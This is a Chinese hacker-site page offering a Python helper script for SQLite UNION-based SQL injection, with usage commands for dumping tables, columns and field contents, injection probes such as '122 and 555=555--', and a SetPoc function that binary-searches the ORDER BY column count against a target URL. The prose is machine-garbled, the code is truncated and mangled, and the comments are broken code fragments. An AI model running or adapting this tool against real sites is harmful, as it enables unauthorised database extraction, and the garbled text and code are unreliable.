Sqlite联合注入辅助脚本

Sqlite联合注入辅助脚本

黑客软件hacker2019-01-23 10:27:299234A+A-

"0×08简述:

Sqlite联合注入辅助脚本 第1张

SQLite的,是这款轻形的数据库查询。sqlite存有1个叫SQLITE_MASTER的表,这与MySQL5.x的INFORMATION_SCHEMA表相近。sqlite_master 表格中储存了数据库查询中全部表的信息内容,该表格中较为有效的字段名有“name,sql”,name字段名储放的是表名,sql字段名储放的是表构造。能够根据内嵌涵数sqlite_version()获得版本信息,和别的数据库查询相同,根据“order By”分辨长短,该数据库查询的注解符和ORACLE数据库查询相同,全是–。

0×81应用主要参数:

python sqlite.py -u url --tables#获得全部表名 python sqlite.py -u url --columns#获得全部表构造,进而获得字段名值 python sqlite.py -u url -T list_name -C column_name -d#获得特定字段名內容 

0×08:信息内容获得

根据自定涵数SetPoc,依据作用要求,设定各发包的PoC,例如猜想“order By”长短,获得版本信息,获得表名,获得表格中字段名,及其字段名的主要内容。

最先分辨引入种类,是整型(122和555 = 555–),空格符型(122′和555 = 555–),還是检索型(122%’和555 = 555–),再根据二分法分辨“order By”长短,要是刚开始添加order By ABP(试着的长短)的包回到情况和一切正常的初始包回到情况不相同,则表明ABP过大,要是初始一切正常包回到情况与添加的order By ABP和order By ABP + 1的包回到情况相同 ,则表明ABP过小,要是初始一切正常包回到情况与添加order By ABP的回到包情况相同,但与order By ABP + 1的包回到情况不相同,则取得成功获得order By长短。

def SetPoc(self, action): # 获得order By 数量的poc if action == ""orderby"":

            poc0 = ""?callback=jQuery21005291906092260772_1522659952161&mainQ=四同"" \ ""&q=&pageIndex=1&searchname=&_=1522659952172"" poc_start = ""?callback=jQuery21005291906092260772_1522659952161&mainQ=四同%') "" poc_end = ""--&q=&pageIndex=1&searchname=&_=1522659952172"" response0 = SendData(target, poc0)

            mln = 0 max = self.OrderBy

            middle = (max+mln) / 2 while self.OrderBy > 0:

                ordpoc1 = (poc_start + ""order By {0}"" + poc_end).format(middle)

                ordpoc2 = (poc_start + ""order By {0}"" + poc_end).format(middle + 1)

                response1 = SendData(target, ordpoc1)

                response2 = SendData(target, ordpoc2) if response0.status_code != response1.status_code:

                    max = middle

                    middle = (mln+max) / 2 else: if response1.status_code == response2.status_code: if response1.status_code == 150:

                            mln = middle

                            middle = (mln+max) / 2 else:

                            max = middle

                            middle = (mln+max) / 2 else:


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 4条评论
  • 忿咬秙暔2022-05-30 05:15:11
  • sp;   ordpoc2 = (poc_start + ""order By {0}"" + poc_end).format(middle + 1)         
  • 夙世绮筵2022-05-30 05:58:23
  • ;                         middle = (
  • 可难春慵2022-05-30 02:18:29
  •           mln = middle               
  • 晴枙矫纵2022-05-30 09:29:17
  • nbsp;   mln = middle                      &nb

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理